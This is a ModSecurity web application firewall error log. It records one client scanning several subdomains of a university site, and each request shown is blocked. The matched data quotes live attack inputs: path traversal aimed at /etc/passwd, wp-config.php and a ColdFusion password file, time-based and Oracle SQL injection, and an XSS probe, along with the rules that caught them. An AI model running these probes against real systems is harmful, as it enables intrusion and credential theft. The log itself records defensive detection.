[Tue Aug 29 11:43:31.385318 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAdb7p4AAAAb"]
[Tue Aug 29 11:43:31.406120 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAdb7p8AAAAb"]
[Tue Aug 29 11:43:31.415805 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAARpg8sAAAAU"]
[Tue Aug 29 11:43:31.416391 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfGaYMAAAAT"]
[Tue Aug 29 11:43:31.428697 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfFJ-QAAAAR"]
[Tue Aug 29 11:43:31.511466 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAfAOaMAAAAH"]
[Tue Aug 29 11:43:31.511475 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAfGaYQAAAAT"]
[Tue Aug 29 11:43:31.615277 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13c8Co-f0AAAfGaYYAAAAT"]
[Tue Aug 29 11:43:32.403516 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13dMCo-f0AAAdxUW0AAAAC"]
[Tue Aug 29 11:43:36.377648 2023] [:error] [pid 1994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAfK-C0AAAAW"]
[Tue Aug 29 11:43:36.377661 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAdxUXcAAAAC"]
[Tue Aug 29 11:43:36.381733 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAdeQ50AAAAQ"]
[Tue Aug 29 11:43:36.386683 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAe1ehoAAAAB"]
[Tue Aug 29 11:43:36.440129 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAARpg9UAAAAU"]
[Tue Aug 29 11:43:37.407556 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAcsLMEAAAAE"]
[Tue Aug 29 11:43:37.424515 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAeAW9UAAAAu"]
[Tue Aug 29 11:43:37.435300 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAdSZWAAAAAX"]
[Tue Aug 29 11:43:37.445435 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAe399IAAAAA"]
[Tue Aug 29 11:43:37.456224 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAARpg9kAAAAU"]
[Tue Aug 29 11:43:37.463272 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ecCo-f0AAAe1eh0AAAAB"]
[Tue Aug 29 11:43:38.382460 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13esCo-f0AAAe8l18AAAAF"]
[Tue Aug 29 11:43:40.391832 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAfGaZkAAAAT"]
[Tue Aug 29 11:43:40.400379 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAfBL0cAAAAI"]
[Tue Aug 29 11:43:40.405172 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAdb7rMAAAAb"]
[Tue Aug 29 11:43:40.425251 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAdeQ6MAAAAQ"]
[Tue Aug 29 11:43:40.428918 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAeChd4AAAAw"]
[Tue Aug 29 11:43:40.451521 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfEBuwAAAAO"]
[Tue Aug 29 11:43:40.470377 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAeChd8AAAAw"]
[Tue Aug 29 11:43:40.491232 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAdb7rYAAAAb"]
[Tue Aug 29 11:43:40.496523 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAARpg@MAAAAU"]
[Tue Aug 29 11:43:40.500999 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfEBu4AAAAO"]
[Tue Aug 29 11:43:41.360974 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13fcCo-f0AAAdftbEAAAAG"]
[Tue Aug 29 11:43:41.383507 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fcCo-f0AAAfGaZ4AAAAT"]
[Tue Aug 29 11:43:42.412922 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAe8l2YAAAAF"]
[Tue Aug 29 11:43:42.532786 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdb7rwAAAAb"]
